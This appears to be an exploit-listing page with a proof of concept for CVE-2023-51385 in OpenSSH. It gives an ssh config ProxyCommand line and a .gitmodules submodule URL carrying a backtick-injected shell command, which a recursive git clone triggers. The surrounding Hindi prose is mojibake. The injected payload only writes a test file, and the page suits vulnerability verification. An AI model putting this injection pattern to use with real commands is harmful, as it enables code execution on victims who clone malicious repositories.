## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-LTMTHINK-CVE-2023-51385_TEST
## CVE-2023-51385 рдХрд╛ рд╕рддреНрдпрд╛рдкрди
рд╕рдмрд╕реЗ рдкрд╣рд▓реЗ `~/.ssh/config` рдореЗрдВ рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рд╕рд╛рдордЧреНрд░реА рдЬреЛрдбрд╝реЗрдВ
root@kitploit:~
host *.example.com
ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p
`.gitmodules` рдлрд╝рд╛рдЗрд▓ рдХрдерди рдореЗрдВ рдХрдорд╛рдВрдб рдЗрдВрдЬреЗрдХреНрд╢рди рдореМрдЬреВрдж рд╣реИ
root@kitploit:~
url = ssh://`echo helloworld > cve.txt`foo.example.com/bar
рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди рдкреВрд░рд╛ рд╣реЛрдиреЗ рдХреЗ рдмрд╛рдж, рдиреАрдЪреЗ рджрд┐рдП рдЧрдП рдХрдорд╛рдВрдб рдХреЛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░реЗрдВ
root@kitploit:~
git clone https://github.com/LtmThink/CVE-2023-51385_test --recurse-submodules
рдпрджрд┐ рд╕рдлрд▓рддрд╛рдкреВрд░реНрд╡рдХ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ, рддреЛ CVE-2023-51385_test рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдореЗрдВ cve.txt рдлрд╝рд╛рдЗрд▓ рдЙрддреНрдкрдиреНрди рд╣реЛрдЧреА

рдиреЛрдЯ: OpenSSH рдХреЛ <9.6p1 рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИ
рд╡рд┐рд╕реНрддреГрдд рдЬрд╛рдирдХрд╛рд░реА рдХреЗ рд▓рд┐рдП рдпрд╣ рдмреНрд▓реЙрдЧ рдкреЛрд╕реНрдЯ рджреЗрдЦреЗрдВ:
https://vin01.github.io/piptagole/ssh/security/openssh/libssh/remote-code-execution/2023/12/20/openssh-proxycommand-libssh-rce.html